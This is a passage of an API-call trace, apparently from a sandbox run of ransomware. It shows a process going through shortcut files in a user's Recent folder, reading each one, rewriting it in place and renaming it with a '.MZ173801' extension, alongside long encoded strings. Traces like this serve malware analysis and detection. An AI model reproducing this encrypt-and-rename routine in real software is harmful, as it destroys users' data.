lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0107.355] GetCurrentThreadId () returned 0x1358 [0107.355] GetCurrentThreadId () returned 0x1358 [0107.355] GetCurrentThreadId () returned 0x1358 [0107.356] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.356] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0107.356] GetCurrentThreadId () returned 0x1358 [0107.356] GetCurrentThreadId () returned 0x1358 [0107.356] GetCurrentThreadId () returned 0x1358 [0107.356] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BXHxcreN0NZMlQbLh4Mv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\bxhxcren0nzmlqblh4mv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.356] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0107.356] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.356] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x473 [0107.356] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.357] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x473, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x473, lpOverlapped=0x0) returned 1 [0107.357] CloseHandle (hObject=0x3f4) returned 1 [0107.357] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BXHxcreN0NZMlQbLh4Mv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\bxhxcren0nzmlqblh4mv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.358] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x473, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x473, lpOverlapped=0x0) returned 1 [0107.359] CloseHandle (hObject=0x3f4) returned 1 [0107.360] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BXHxcreN0NZMlQbLh4Mv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\bxhxcren0nzmlqblh4mv.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BXHxcreN0NZMlQbLh4Mv.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\bxhxcren0nzmlqblh4mv.lnk.mz173801")) returned 1 [0107.361] GetCurrentThreadId () returned 0x1358 [0107.361] GetCurrentThreadId () returned 0x1358 [0107.361] GetCurrentThreadId () returned 0x1358 [0107.361] GetCurrentThreadId () returned 0x1358 [0107.361] GetCurrentThreadId () returned 0x1358 [0107.361] GetCurrentThreadId () returned 0x1358 [0107.361] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecf0268b, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xecf0268b, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xecf0268b, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="cbJumAv3Kocmj1zm.lnk", cAlternateFileName="CBJUMA~1.LNK")) returned 1 [0107.361] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0107.361] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0107.361] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cbJumAv3Kocmj1zm.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\cbjumav3kocmj1zm.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecf0268b, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xecf0268b, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xecf0268b, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x536)) returned 1 [0107.361] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.361] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0107.362] GetCurrentThreadId () returned 0x1358 [0107.362] GetCurrentThreadId () returned 0x1358 [0107.362] GetCurrentThreadId () returned 0x1358 [0107.362] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.362] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0107.362] GetCurrentThreadId () returned 0x1358 [0107.362] GetCurrentThreadId () returned 0x1358 [0107.362] GetCurrentThreadId () returned 0x1358 [0107.362] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cbJumAv3Kocmj1zm.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\cbjumav3kocmj1zm.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.362] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0107.363] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.363] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x536 [0107.363] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.363] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x536, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x536, lpOverlapped=0x0) returned 1 [0107.363] CloseHandle (hObject=0x3f4) returned 1 [0107.364] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cbJumAv3Kocmj1zm.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\cbjumav3kocmj1zm.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.364] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x536, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x536, lpOverlapped=0x0) returned 1 [0107.365] CloseHandle (hObject=0x3f4) returned 1 [0107.366] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cbJumAv3Kocmj1zm.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\cbjumav3kocmj1zm.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cbJumAv3Kocmj1zm.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\cbjumav3kocmj1zm.lnk.mz173801")) returned 1 [0107.367] GetCurrentThreadId () returned 0x1358 [0107.367] GetCurrentThreadId () returned 0x1358 [0107.367] GetCurrentThreadId () returned 0x1358 [0107.367] GetCurrentThreadId () returned 0x1358 [0107.367] GetCurrentThreadId () returned 0x1358 [0107.367] GetCurrentThreadId () returned 0x1358 [0107.367] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74e02d76, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x74e02d76, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x74e02d76, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3d6, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="CSedB5fZ.lnk", cAlternateFileName="")) returned 1 [0107.367] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, 